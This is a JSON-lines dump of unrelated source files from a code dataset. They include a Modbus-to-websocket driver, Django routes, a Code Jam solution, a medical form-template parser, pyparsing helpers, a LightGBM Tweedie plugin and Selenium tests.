\"densimetro\",\r\n \"id_instrumentacion\": \"37\",\r\n },\r\n \"servidor\": {\r\n \"online\": True,\r\n },\r\n \"online_status\": {\r\n \"estado_sensando\": True\r\n },\r\n \"data\": {\r\n \"densidadTR\": str(densidadTR.registers[0]),\r\n \"densidadComponent\": str(densidadComponent.registers[0]),\r\n \"unidad\": \"Kg m^3\",\r\n }\r\n },\r\n \"caudalimetro\":{\r\n \"config\": {\r\n \"version\": 0.1,\r\n \"tipo\": \"caudalimetro\",\r\n \"id_instrumentacion\": \"38\",\r\n },\r\n \"servidor\": {\r\n \"online\": True,\r\n },\r\n \"online_status\": {\r\n \"estado_sensando\": True\r\n },\r\n \"data\": {\r\n \"masaTR\": str(masaTR.registers[0]),\r\n \"unidad\": \"s/u\",\r\n }\r\n },\r\n \"bsw\":{\r\n \"config\": {\r\n \"version\": 0.1,\r\n \"tipo\": \"bsw\",\r\n \"id_instrumentacion\": \"39\",\r\n },\r\n \"servidor\": {\r\n \"online\": True,\r\n },\r\n \"online_status\": {\r\n \"estado_sensando\": True\r\n },\r\n \"data\": {\r\n \"BSWTR\": str(BSWTR.registers[0]),\r\n \"unidad\": \"s/u\",\r\n }\r\n },\r\n \"gravidad\":{\r\n \"config\": {\r\n \"version\": 0.1,\r\n \"tipo\": \"gravidad\",\r\n \"id_instrumentacion\": \"40\",\r\n },\r\n \"servidor\": {\r\n \"online\": True,\r\n },\r\n \"online_status\": {\r\n \"estado_sensando\": True\r\n },\r\n \"data\": {\r\n \"gravidadTR\": str(gravidadTR.registers[0]),\r\n \"unidad\": \"s/u\",\r\n }\r\n },\r\n \"kFactor\":{\r\n \"config\": {\r\n \"version\": 0.1,\r\n \"tipo\": \"kFactor\",\r\n \"id_instrumentacion\": \"26\",\r\n },\r\n \"servidor\": {\r\n \"online\": True,\r\n },\r\n \"online_status\": {\r\n \"estado_sensando\": True\r\n },\r\n \"data\": {\r\n \"kFactor\": str(kFactor.registers[0]),\r\n \"unidad\": \"adimensional\",\r\n }\r\n },\r\n \"vcf\":{\r\n \"config\": {\r\n \"version\": 0.1,\r\n \"tipo\": \"vcf\",\r\n \"id_instrumentacion\": \"12\",\r\n },\r\n \"servidor\": {\r\n \"online\": True,\r\n },\r\n \"data\": {\r\n \"estado_abierta\": False,\r\n }\r\n },\r\n # \"vcf_descarga\": {\r\n # \"config\": {\r\n # \"version\": 0.1,\r\n # \"tipo\": \"vcf\",\r\n # \"id_instrumentacion\": \"12\",\r\n # },\r\n # \"servidor\": {\r\n # \"online\": True,\r\n # },\r\n # \"data\": {\r\n # \"estado_abierta\": True,\r\n # }\r\n # },\r\n \"valvula_de_tanques\":[\r\n {\r\n \"config\": {\r\n \"version\": 0.1,\r\n \"tipo\": \"vcf\",\r\n \"id_instrumentacion\": \"12\",\r\n \"producto\": \"regular\"\r\n },\r\n \"servidor\": {\r\n \"online\": True,\r\n },\r\n \"data\": {\r\n \"estado_abierta\": True,\r\n }\r\n },\r\n {\r\n \"config\": {\r\n \"version\": 0.1,\r\n \"tipo\": \"vcf\",\r\n \"id\": \"12\",\r\n \"producto\": \"premium\"\r\n },\r\n \"servidor\": {\r\n \"online\": True,\r\n },\r\n \"data\": {\r\n \"estado_abierta\": True,\r\n }\r\n },\r\n # {\r\n # \"config\": {\r\n # \"version\": 0.1,\r\n # \"tipo\": \"vcf\",\r\n # \"id\": \"12\",\r\n # \"producto\": \"diesel\"\r\n # },\r\n # \"servidor\": {\r\n # \"online\": True,\r\n # },\r\n # \"data\": {\r\n # \"estado_abierta\": True,\r\n # }\r\n # }\r\n ],\r\n \"permisivo_tierra\":{\r\n \"config\": {\r\n \"version\": 0.1,\r\n \"tipo\": \"permisivo\",\r\n \"id_instrumentacion\": \"12\",\r\n },\r\n \"servidor\": {\r\n \"online\": True,\r\n },\r\n \"data\": {\r\n \"estado_activado\": True,\r\n }\r\n },\r\n \"permisivo_sobrellenado\":{\r\n \"config\": {\r\n \"version\": 0.1,\r\n \"tipo\": \"permisivo\",\r\n \"id_instrumentacion\": \"12\",\r\n },\r\n \"servidor\": {\r\n \"online\": True,\r\n },\r\n \"data\": {\r\n \"estado_activado\": True,\r\n }\r\n }\r\n }\r\n\r\n json_txt = json.dumps( servidor_driver_ucl)\r\n\r\n await conn.write_message(json_txt)\r\n\r\n await asyncio.sleep(0.5)\r\n\r\n client.close()\r\n\r\n\r\n \r\n \r\n except ConnectionRefusedError:\r\n print('error: ConnectionRefusedError')\r\n sys.exit(1)\r\n except TimeoutError:\r\n print('error: TimeoutError')\r\n sys.exit(1)\r\n print('done')\r\n sys.exit(0)\r\n\r\nasyncio.run(main())","sub_path":"driver/modbus2websocket.py","file_name":"modbus2websocket.py","file_ext":"py","file_size_in_byte":18425,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"150928027","text":"from django.urls import path\nfrom .views import customerView, orderView, orderDetails, salesView,placing_order\n\nurlpatterns = [\n path('customer/',customerView.as_view()), # url to add and get customers\n path('order/',orderView.as_view()), # url to add and get orders\n path('details//', orderDetails.as_view()),\n path('sales/',salesView.as_view()), # url to add and get sales-person\n path('order/delivery//',placing_order.as_view()), # url to palce and confirm orders\n # path('order/new/',placeOrder.as_view()),\n]\n","sub_path":"quickapp/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":547,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"16358287","text":"\r\ndef get_diff_index(seq):\r\n\tlast = None\r\n\tfor i, x in enumerate(seq, start=0):\r\n\t\tif not last:\r\n\t\t\tlast = x\r\n\t\tif not last == x:\r\n\t\t\treturn i\r\ndef run(seq):\r\n\tcount = 0\r\n\tlength = len(seq)\r\n\twhile not seq.count('+') == length:\r\n\t\tdiff = get_diff_index(seq)\r\n\t\tif diff is None:\r\n\t\t\tseq = '+'*length\r\n\t\telif not diff == length:\r\n\t\t\tseq = seq[diff]*diff + seq[diff:]\r\n\t\tcount +=1\r\n\treturn count\r\n\r\ntxt = ''\r\nwith open('B-large.in', 'r') as f:\r\n\ttxt = f.read()\r\n\ttxt = txt.split('\\n')\r\n\twith open('b.out', 'w') as f:\r\n\t\tfor test_case in range(1, int(txt.pop(0))+1):\r\n\t\t\tseq = txt.pop(0)\r\n\t\t\tf.write('Case #%d: %d\\n'%(test_case, run(seq)))","sub_path":"codes/CodeJamCrawler/16_0_2_neat/16_0_2_SecondX_codejamb.py","file_name":"16_0_2_SecondX_codejamb.py","file_ext":"py","file_size_in_byte":635,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"251801851","text":"import logging\nimport re\nimport itg\n\n# ============================================================================\n# Setup logging\n# ============================================================================\nlogging.basicConfig(level=logging.CRITICAL,\n format='%(levelname)-9s: %(name)s : %(funcName)s() : %(message)s')\nlog = logging.getLogger('template_models')\nlog.setLevel(logging.DEBUG)\n\n\n# ============================================================================\n# AhltaTemplate: dictionary-based template model\n# ============================================================================\nclass AhltaTemplate:\n \n # Constructor\n def __init__(self, fhand, logging=True):\n self.header = []\n self.pages = {}\n self.logging = logging\n\n with open(fhand, 'r', encoding='latin1') as f:\n if self.logging:\n log.warning('file arbitrarily opened as latin1 encoding')\n self.template = f.readlines()\n\n # TODO make this a try block\n if self._validate_template():\n self._parse_items()\n self._parse_header()\n else:\n log.error('Template validation failed.')\n\n # Private Methods\n def _validate_template(self):\n if self.logging:\n log.warning('partially implemented')\n log.info(f'Form Signature: {itg.validate_form_signature(self.template[0])}')\n log.info(f'Form Identification: {itg.validate_form_identification(self.template[1])}')\n log.info(f'Form Object: {itg.validate_form_obj(self.template[2])}')\n log.info(f'Tabstrip Object: {itg.validate_tabstrip_obj(self.template[3])}')\n log.info(f'BrowseTree Object: {itg.validate_browsetree_obj(self.template[4])}')\n #log.info(f'Form Item: {itg.Validator.validate_form_item(self.template[5])}')\n return True\n\n\n def _parse_items(self):\n # Store items by page in a dictionary, using page numbers as keys\n line_num = 1\n for line in self.template:\n if line_num <= 5: # first five lines belong to the header\n self.header.append(line) \n else:\n #line = line.rstrip() # strip any newline characters\n tokens = line.split(',', maxsplit=9) # split into tokens\n key = int(tokens[0]) # use the first token as the key\n if key not in self.pages:\n self.pages[key] = [] # add that key with an empty (unnamed) list\n self.pages[key].append(line) # otherwise add the line to an existing list\n line_num += 1\n\n \n def _parse_header(self):\n # Extract template-level information\n self.form_signature = self.header[0].rstrip() #version of medcin form designer software\n self.form_name = self.header[1].split(',', maxsplit=9)[0]\n self.form_owner = self.header[1].split(',', maxsplit=9)[1]\n self.form_group = self.header[1].rstrip().split(',', maxsplit=9)[2]\n self.form_sid = 'none'\n if len(self.header[1].split(',', maxsplit=9)) == 4:\n self.form_sid = self.header[1].rstrip().split(',', maxsplit=9)[3]\n \n # get page names and count\n self.page_names = self._parse_page_names()\n #self.page_count = len(self.visible_page_names)\n self.page_count = len(self.pages)\n \n # Setup important header pieces\n self.form_obj = self.header[2]\n self.tabstrip = self.header[3]\n self.browsetree = self.header[4]\n \n # ensure we've got the Form line (3rd line of header) before getting width, height\n if int(itg.FLAGS(self.form_obj)) == itg.ControlFlag.FORM:\n \n self.form_width = itg.RIGHT(self.form_obj)\n self.form_height = itg.BOTTOM(self.form_obj)\n \n else:\n print('ERROR: Incorrect flag on line 3 of header (should be 1048576')\n print(f'Line 3 of header: {self.form_obj}')\n \n # ensure we've got the TabStrip obj\n if int(itg.FLAGS(self.tabstrip)) == itg.ControlFlag.TABSTRIP:\n form_backcolor_search = re.search('(?<=:)(.*?)(?=:)', itg.DESCRIPTION(self.tabstrip))\n if form_backcolor_search:\n self.form_backcolor = form_backcolor_search.group(1)\n \n #self.form_border_style -BS\n #self.form_default_checkbox_style -CB\n #self.details_frame -DF\n #self.form_em_button -EM\n #self.form_flowsheet_button -FB\n #self.form_multirow -MR\n #self.form_negative_buttons -NB\n #self.form_positive_buttons -PB\n #self.form_picklist_button -PL\n #self.form_page_style -PS\n #self.form_ros_button -ROS\n #self.form_tabstrip_button_placement -TP\n #self.form_tabstrip_tab_width -TWS\n #self.form_version -V\n # often you see L=V= ... unclear why or if necessary\n else:\n print('ERROR: Incorrect flag on line 4 of header (should be 32)')\n print(f'Line 4 of header: {self.tabstrip}')\n\n def _parse_page_names(self):\n # Page names need to be cleaned of prefixes and suffixes:\n # :numbers: for page 1 indicates back color of the form\n # # (no_browsing), < (left_lateral), > (right_lateral)\n # %int denotes number of columns on the page\n # ~int as a suffix denotes a narrative chapter assignment\n raw = itg.DESCRIPTION(self.header[3])\n \n tokens = raw.strip('\\\"').split('|')\n clean_tokens = []\n clean_tokens.append('')\n \n page_one = re.sub(r'\\%\\d','',tokens[0].split(':')[len(tokens[0].split(':')) - 1])\n clean_tokens.append(page_one)\n \n for page in range(len(tokens)):\n if page == 0:\n continue\n else:\n cleaned_page = re.sub(r'\\%\\d','',tokens[page])\n clean_tokens.append(cleaned_page)\n \n return clean_tokens\n\n\n def _parse_form_properties(self):\n pass\n\n\n def _validate_header(self):\n # ToDo:\n # header lines are in the expected place\n # form_sid is accounted for\n # specified page count matches number of page names (for visible pages,\n # ignoring page 0)\n # Form object is the third item, and has a width and height\n # TabStrip object is appropriate\n # BrowseTree object is appropriate\n pass\n\n \n # Public Methods\n def info(self):\n page_info = f'Pages ({self.page_count}):\\n'\n for page, item_list in sorted(self.pages.items()):\n page_label = str(page) + f' [{self.page_names[page]}]'\n page_info += f' {page_label}: {len(item_list)} items\\n'\n \n return(f'Template: {self.form_name}\\n' +\n f'Owner: {self.form_owner}\\n' +\n f'Group: {self.form_group}\\n' +\n f'Software: {self.form_signature}\\n' +\n f'Security ID: {self.form_sid}\\n\\n' +\n f'Width: {self.form_width} pixels\\n' +\n f'Height: {self.form_height} pixels\\n\\n' +\n page_info +\n f'Total (including header): {len(self.template)} items'\n )\n \n def print_info(self):\n print(self.info())\n \n def print_header(self):\n for line in self.header:\n print(line)\n \n def print_by_page(self, page):\n print(f'Page: {page} ({(len(self.pages[page]))} items)')\n for line in self.pages[page]:\n print(line.rstrip())\n\n# ============================================================================\n# AhltaTemplateDF: dataframe-based template model\n# ============================================================================\nimport pandas as pd\n\nclass AhltaTemplateDF:\n # Constructor\n def __init__(self, fhand, logging=True):\n self.header = []\n self.pages = {}\n self.logging = logging\n\n with open(fhand, 'r', encoding='latin1') as f:\n if self.logging:\n log.warning('File arbitrarily opened as latin1 encoding.')\n self.template = f.readlines()\n\n self._parse_items()\n\n def _parse_items(self):\n # Store items in a dataframe of series\n imported_items = []\n cols = ['page', 'left', 'top', 'right', 'bottom', 'medcin', 'flags',\n 'prefix', 'item_data', 'description']\n\n line_num = 1\n for line in self.template:\n if line_num <= 5: # first five lines belong to the header\n self.header.append(line)\n else:\n imported_items.append(pd.Series(itg.item_to_simple_series(line), index=cols))\n\n line_num += 1\n\n self.items = pd.DataFrame(imported_items, columns=cols)\n\n # Public methods\n def info(self):\n print('Item counts by page:')\n print(self.items.page.value_counts().sort_index())\n print('\\nFlag counts:')\n print(self.items.flags.value_counts().sort_index())\n\n# ============================================================================\n# AhltaTemplateXml: xml-based template model\n# ============================================================================\nclass AhltaTemplateXml:\n pass\n\n\n# ===========================================================================+\n# XML-related functions\n# TODO: MOVE INTO ITEM_PARSER OR MAKE ITS OWN CLASS\n# ===========================================================================+\nimport xml.etree.ElementTree as ET\n#from ahlta_template import ahlta_template\n#from ahlta_item import item_Parser as ip\n\n# Takes a parsed item (from parse_template_item) and returns an xml node\n# This WILL break if used for items without every property \n# e.g., \"\" for prefix or description without a tilde\ndef detailed_parsed_item_to_xml(parsed_item, name='item'):\n subelements = [\n 'page',\n 'left', 'top', 'right', 'bottom',\n 'medcin_id', 'flags', \n 'prefix', 'modifier', 'result',\n 'status', 'value', 'link_group',\n 'units', 'box_offset', 'inline_textbox_width',\n 'component_sequence', 'index_to_reference_list',\n 'narrative_group_assignment', \n 'chky_caption', 'chkn_caption', 'bit_flags',\n 'limit_max', 'limit_min', 'ribbon_trigger_id',\n 'cluster_id', 'parent_ribbon_id', 'radio_button_group',\n 'image_id', 'hotspot_set_id', 'parent_frame',\n 'code_mapping', 'user_assigned_subgroup',\n 'item_data', 'caption', 'content'\n ]\n \n item_node = ET.Element(name)\n \n for i in range(len(subelements)):\n sub_el = ET.SubElement(item_node, subelements[i])\n sub_el.text = parsed_item[i]\n \n return item_node\n\n\ndef simple_parsed_item_to_xml(item, name):\n subelements = [\n 'page',\n 'left', 'top', 'right', 'bottom',\n 'medcin_id', 'flags', \n 'prefix', 'item_data', 'description'\n ]\n \n item_node = ET.Element(name)\n \n for i in range(len(subelements)):\n sub_el = ET.SubElement(item_node, subelements[i])\n sub_el.text = item[i]\n \n return item_node \n\n\ndef unparsed_item_to_xml(item, name):\n parsed = item.rstrip().split(',', maxsplit=9) # simple parse\n return simple_parsed_item_to_xml(parsed, name) \n\n\ndef convert_template_to_xml(template):\n # TODO: Do we need to write xml version/encoding info first?\n \n template_xml = ET.Element('template')\n header = ET.SubElement(template_xml, 'header')\n \n for i in range(template.page_count+1): # +1 b/c page_count ignores page_0\n # setup the node for the page\n node_name = 'page_' + str(i)\n page_node = ET.SubElement(template_xml, node_name)\n \n for item in template.pages[i]:\n ctrl_flag = str(itg.FLAGS(item))\n item_node = unparsed_item_to_xml(item, ctrl_flag)\n page_node.append(item_node)\n \n # Use template name as filename\n f_out = template.form_name.strip('\"') + '.xml'\n \n # Write to file with xml declaration\n ET.ElementTree(template_xml).write(f_out, encoding='utf-8', xml_declaration=True) \n\n\n#convert_template_to_xml(template)","sub_path":"itg/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":12369,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"646214931","text":"import pandas as pd\nimport DB\nimport datetime\nimport time\nimport os\n\n\npath = os.getcwd()\nnow = datetime.datetime.now() + datetime.timedelta( hours=-1)\ntime = now.strftime(\"%Y-%m-%d %H\")\nuser_size = DB.user_size()\n\n\ndef DB_Data_Csv_Save():\n timestamp = []\n temp = []\n humidity =[]\n gas =[]\n water = []\n volt = []\n\n for i in range(user_size):\n data = DB.select_data(i)\n water_data =DB.select_water(i)\n gas_data =DB.select_gas(i)\n volt_data =DB.select_volt(i)\n\n for j in range(len(data)):\n timestamp.append(data[j][0])\n temp.append(data[j][1])\n humidity.append(data[j][2])\n gas.append(gas_data[j][0])\n water.append(water_data[j][0])\n volt.append(volt_data[j][0])\n\n label = {'timestamp' : timestamp, 'temp' : temp ,'humidity':humidity , 'gas' : gas, 'water' : water, 'volt': volt}\n\n dataframe = pd.DataFrame(label)\n dataframe.to_csv(f'{path}\\Data\\Time_Serial_Anomaly{time}_{i}.csv',index=False,header=True )\n\n #list clear\n timestamp.clear()\n temp.clear()\n humidity.clear()\n gas.clear()\n water.clear()\n volt.clear()\n","sub_path":"DB_csv.py","file_name":"DB_csv.py","file_ext":"py","file_size_in_byte":1204,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"279478748","text":"\"\"\"\nA script that grabs a text file, and splits the file into separate words\n\"\"\"\n\nfrom copy import copy\nimport string\n\ndef convertInvalidCharacters(inputString):\n \"\"\"Take a string and replace any non-english characters or spaces with spaces, then return the result\n\n This method converts any characters that aren't a-z or A-Z or a space into space.\n\n Arguments:\n inputString (string): The string to be processed.\n\n Returns:\n returnVal (string): A copy of the input with the invalid characters removed.\n \"\"\"\n def validChar(char):\n \"\"\"Check if the character given is a lowercase english, uppercase english or a space character.\"\"\"\n isValid = False\n if char in string.ascii_lowercase:\n isValid = True\n if char in string.ascii_uppercase:\n isValid = True\n if char == ' ':\n isValid = True\n\n return isValid\n\n returnVal = copy(inputString)\n\n for index, char in enumerate(inputString):\n if not validChar(char):\n returnVal = returnVal[:index] + ' ' + returnVal[index+1:]\n\n return returnVal\n\ndef main(inputFilename):\n \"\"\"Process inputFile and write it to a text file called splitwords.txt\n\n This method takes the input file, converts all non-english characters to spaces, then converts all characters to\n uppercase, and finally tokenizes the file (space delimiited) and outputs the result to a text file.\n\n Arguments:\n inputFilename (string): The file to read from\n \"\"\"\n with open(inputFilename, \"r\") as file:\n fileString = \"\"\n for line in file:\n fileString += line\n\n fileString = convertInvalidCharacters(fileString)\n\n fileString = fileString.upper()\n\n words = fileString.split()\n\n with open(\"../output/splitwords.txt\", \"w\") as outputFile:\n for word in words:\n if len(word) != 1:\n print(word, file=outputFile)\n\nif __name__ == '__main__':\n # Uncomment the other line to use the other file as input\n filename = \"../inputFiles/essaysOfFrancisBacon.txt\"\n # filename = \"../inputFiles/hamletByShakespeare.txt\"\n main(filename)\n","sub_path":"src/splitFile.py","file_name":"splitFile.py","file_ext":"py","file_size_in_byte":2171,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"10290434","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.6 (62161)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build\\bdist.win32\\egg\\pylon\\io\\parsing_util.py\n# Compiled at: 2010-12-26 13:36:33\n\"\"\" Defines convenience pyparsing constructs and token converters.\n\nBased on sparser.py by Tim Cera timcera@earthlink.net.\n\"\"\"\nfrom pyparsing import TokenConverter, oneOf, string, Literal, Group, Word, Optional, Combine, sglQuotedString, dblQuotedString, restOfLine, nums\n\nclass ToBoolean(TokenConverter):\n \"\"\" Converter to make token boolean \"\"\"\n\n def postParse(self, instring, loc, tokenlist):\n \"\"\" Converts the first token to boolean \"\"\"\n return bool(tokenlist[0])\n\n\nclass ToInteger(TokenConverter):\n \"\"\" Converter to make token into an integer \"\"\"\n\n def postParse(self, instring, loc, tokenlist):\n \"\"\" Converts the first token to an integer \"\"\"\n return int(tokenlist[0])\n\n\nclass ToFloat(TokenConverter):\n \"\"\" Converter to make token into a float \"\"\"\n\n def postParse(self, instring, loc, tokenlist):\n \"\"\" Converts the first token into a float \"\"\"\n return float(tokenlist[0])\n\n\ndecimal_sep = '.'\nsign = oneOf('+ -')\nscolon = Literal(';').suppress()\nmatlab_comment = Group(Literal('%') + restOfLine).suppress()\npsse_comment = Literal('@!') + Optional(restOfLine)\nspecial_chars = string.replace('!\"#$%&\\'()*,./:;<=>?@[\\\\]^_`{|}~', decimal_sep, '')\nboolean = ToBoolean(ToInteger(Word('01', exact=1))).setName('bool')\ninteger = ToInteger(Combine(Optional(sign) + Word(nums))).setName('integer')\npositive_integer = ToInteger(Combine(Optional('+') + Word(nums))).setName('integer')\nnegative_integer = ToInteger(Combine('-' + Word(nums))).setName('integer')\nreal = ToFloat(Combine(Optional(sign) + Word(nums) + Optional(decimal_sep + Word(nums)) + Optional(oneOf('E e') + Optional(sign) + Word(nums)))).setName('real')\npositive_real = ToFloat(Combine(Optional('+') + Word(nums) + decimal_sep + Optional(Word(nums)) + Optional(oneOf('E e') + Word(nums)))).setName('real')\nnegative_real = ToFloat(Combine('-' + Word(nums) + decimal_sep + Optional(Word(nums)) + Optional(oneOf('E e') + Word(nums)))).setName('real')\nq_string = (sglQuotedString | dblQuotedString).setName('q_string')\ncolon = Literal(':')\nlbrace = Literal('{')\nrbrace = Literal('}')\nlbrack = Literal('[')\nrbrack = Literal(']')\nlparen = Literal('(')\nrparen = Literal(')')\nequals = Literal('=')\ncomma = Literal(',')\ndot = Literal('.')\nslash = Literal('/')\nbslash = Literal('\\\\')\nstar = Literal('*')\nsemi = Literal(';')\nat = Literal('@')\nminus = Literal('-')\ncomma_sep = comma.suppress()\n\ndef make_unique_name(base, existing=[], format='%s_%s'):\n \"\"\" Return a name, unique within a context, based on the specified name.\n\n @param base: the desired base name of the generated unique name.\n @param existing: a sequence of the existing names to avoid returning.\n @param format: a formatting specification for how the name is made unique.\n \"\"\"\n count = 2\n name = base\n while name in existing:\n name = format % (base, count)\n count += 1\n\n return name","sub_path":"pycfiles/Pylon-0.4.4-py2.6/parsing_util.py","file_name":"parsing_util.py","file_ext":"py","file_size_in_byte":3140,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"575895794","text":"errorlowV1fore = eventslowV1fore*(sum(lowV1foreenergy)/len(lowV1foreenergy))**2/(lowband*lowexposure*pixV1fore)\nerrorlowV1back = eventslowV1back*(sum(lowV1backenergy)/len(lowV1backenergy))**2/(lowband*lowexposure*pixV1back)\nerrormidV1fore = eventsmidV1fore*(sum(midV1foreenergy)/len(midV1foreenergy))**2/(midband*midexposure*pixV1fore)\nerrormidV1back = eventsmidV1back*(sum(midV1backenergy)/len(midV1backenergy))**2/(midband*midexposure*pixV1back)\nerrorhieV1fore = eventshieV1fore*(sum(hieV1foreenergy)/len(hieV1foreenergy))**2/(hieband*hieexposure*pixV1fore)\nerrorhieV1back = eventshieV1back*(sum(hieV1backenergy)/len(hieV1backenergy))**2/(hieband*hieexposure*pixV1back)\nerrormaxV1fore = eventsmaxV1fore*(sum(maxV1foreenergy)/len(maxV1foreenergy))**2/(maxband*maxexposure*pixV1fore)\nerrormaxV1back = eventsmaxV1back*(sum(maxV1backenergy)/len(maxV1backenergy))**2/(maxband*maxexposure*pixV1back)\n\n#exposure, band, pixel = easy\n#average energy comes easy from events and separation\n\n#events\n\n","sub_path":"new error bars.py","file_name":"new error bars.py","file_ext":"py","file_size_in_byte":991,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"153001977","text":"#!/usr/bin/env python\n\n\"\"\"\nsetup.py file for SWIG KappaCUDA\n\"\"\"\n\nfrom distutils.core import setup, Extension\n\nKappaCUDA_module = Extension('_KappaCUDA',\n sources=['KappaCUDA_wrap.cpp'],\n define_macros=[('USE_OPENGL','1')],\n include_dirs=['/usr/local/cuda/include', '/Program Files/Kappa/include'],\n library_dirs=['/Program Files/Kappa/lib'],\n libraries=['Kappa', 'KappaConfig', 'KappaParser', 'KappaPlugin', 'ffi', 'pcrecpp', 'cuda'],\n )\n\nsetup (name = 'KappaCUDA',\n version = '1.5.0',\n author = 'Psi Lambda LLC',\n author_email='kappa@psilambda.com',\n url='http://psilambda.com',\n description = \"\"\"Module to give easy access to NVIDIA CUDA from Python using the Kappa Library.\"\"\",\n ext_modules = [KappaCUDA_module],\n py_modules = [\"KappaCUDA\"],\n )\n","sub_path":"pypi_install_script/KappaCUDA-1.5.0.tar/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":852,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"587282300","text":"\"\"\"Modified version of Driverless AI's internal LightGBM implementation with tweedie distribution\n\"\"\"\nfrom h2oaicore.models import BaseCustomModel, LightGBMModel\nimport numpy as np\n\n\nclass TweedieLightGBMModel(BaseCustomModel, LightGBMModel):\n _regression = True\n _binary = False\n _multiclass = False\n _mojo = True\n _is_reproducible = False # might not reproduce identically on GPUs\n _testing_can_skip_failure = False # ensure tested as if shouldn't fail\n\n _tweedie_variance_power = 1.5 # PLEASE CONFIGURE\n\n _description = \"LightGBM with Tweedie distribution with tweedie variance power=%g\" % _tweedie_variance_power\n _display_name = \"LightGBM tweedie variance power=%g\" % _tweedie_variance_power\n\n @property\n def has_pred_contribs(self):\n return False # wouldn't sum up to preds\n\n def set_default_params(self,\n accuracy=None, time_tolerance=None, interpretability=None,\n **kwargs):\n # First call the LightGBM set_default_params\n # This will input all model parameters just like DAI would do.\n LightGBMModel.set_default_params(\n self,\n accuracy=accuracy,\n time_tolerance=time_tolerance,\n interpretability=interpretability,\n **kwargs\n )\n # Now we just need to tell LightGBM to use tweedie distribution\n self.params[\"objective\"] = \"tweedie\"\n self.params[\"tweedie_variance_power\"] = TweedieLightGBMModel._tweedie_variance_power\n\n def mutate_params(\n self, get_best=False, time_tolerance=10, accuracy=10, interpretability=1,\n imbalance_ratio=1.0,\n train_shape=(1, 1), ncol_effective=1,\n time_series=False, ensemble_level=0,\n score_f_name: str = None, **kwargs):\n # If we don't override the parent mutate_params method, DAI would have the opportunity\n # to modify the objective and select the winner\n # For demonstration purposes we purposely make sure that the objective\n # is the one we want\n # So first call the parent method to mutate parameters\n super().mutate_params(\n get_best=get_best, time_tolerance=time_tolerance, accuracy=accuracy,\n interpretability=interpretability,\n imbalance_ratio=imbalance_ratio, train_shape=train_shape, ncol_effective=ncol_effective,\n time_series=time_series, ensemble_level=ensemble_level,\n score_f_name=score_f_name, **kwargs)\n # Now we just need to tell LightGBM to use tweedie distribution\n self.params[\"objective\"] = \"tweedie\"\n self.params[\"tweedie_variance_power\"] = TweedieLightGBMModel._tweedie_variance_power\n","sub_path":"models/custom_loss/lightgbm_tweedie.py","file_name":"lightgbm_tweedie.py","file_ext":"py","file_size_in_byte":2728,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"218635183","text":"import os\nimport pytest\nfrom time import sleep\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support import expected_conditions\nfrom selenium.webdriver.support.wait import WebDriverWait\n\nclass TestZy:\n\n def setup(self):\n browser=os.getenv(\"browser\", \"\").lower()\n # 默认使用Chrome\n if browser==\"headless\":\n self.driver = webdriver.PhantomJS()\n elif browser==\"firefox\":\n self.driver = webdriver.Firefox()\n else:\n self.driver=webdriver.Chrome()\n # 无法使用命令运行\n # self.driver = webdriver.Chrome()\n # self.driver=webdriver.Firefox()\n self.driver.get(\"https://testerhome.com/\")\n self.driver.maximize_window()\n self.driver.implicitly_wait(5)\n\n\n def test_lx2(self):\n self.driver.find_element(By.CSS_SELECTOR,'[title=\"MTSC2020 中国互联网测试开发大会议题征集\"]').click()\n self.driver.find_element(By.CSS_SELECTOR,'[data-toggle=\"dropdown\"]').click()\n element1=By.CSS_SELECTOR, '.list-container li:nth-child(4) a '\n WebDriverWait(self.driver, 10).until(expected_conditions.element_to_be_clickable(element1))\n self.driver.find_element(*element1).click()\n\n def test_shetuan(self):\n self.driver.find_element(By.CSS_SELECTOR, \"#main-nav-menu li:nth-child(4)\").click()\n element=By.CSS_SELECTOR, '[data-name=\"霍格沃兹测试学院\"]'\n WebDriverWait(self.driver, 4).until(expected_conditions.element_to_be_clickable(element))\n self.driver.find_element(*element).click()\n\n def test_jinshuju(self):\n self.driver.get(\"https://testerhome.com/topics/21495\")\n element3=(By.CSS_SELECTOR, \".published-form__submit\")\n self.driver.switch_to.frame(0)\n # switch_to.frame切换窗口\n WebDriverWait(self.driver, 10).until(expected_conditions.element_to_be_clickable(element3))\n self.driver.find_element(By.CSS_SELECTOR, \".published-form__submit\").click()\n\n def test_lianjie(self):\n self.driver.get(\"https://testerhome.com/topics/21805\")\n self.driver.find_element(By.PARTIAL_LINK_TEXT, \"第六届中国互联网测试开发大会\").click()\n print(self.driver.window_handles)\n # 打印链接\n self.driver.switch_to.window(self.driver.window_handles[1])\n # 切换到第二个窗口\n self.driver.find_element(By.LINK_TEXT, '演讲申请').click()\n\n def teardown_method(self):\n sleep(5)\n self.driver.quit()\n","sub_path":"test_selenium/test_zuoye.py","file_name":"test_zuoye.py","file_ext":"py","file_size_in_byte":2554,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"604747406","text":"import sys\n\nimport webbrowser\nimport random\n\nimport time\n\nif __name__ == '__main__':\n\n\twith open('regulars.txt', 'r') as f:\n\t\tregular_list = f.read().split('\\n')\n\twith open('irregulars.txt', 'r') as f:\n\t\tirregular_list = f.read().split('\\n')\n\twith open('data.txt', 'r') as f:\n\t\tdata_list = 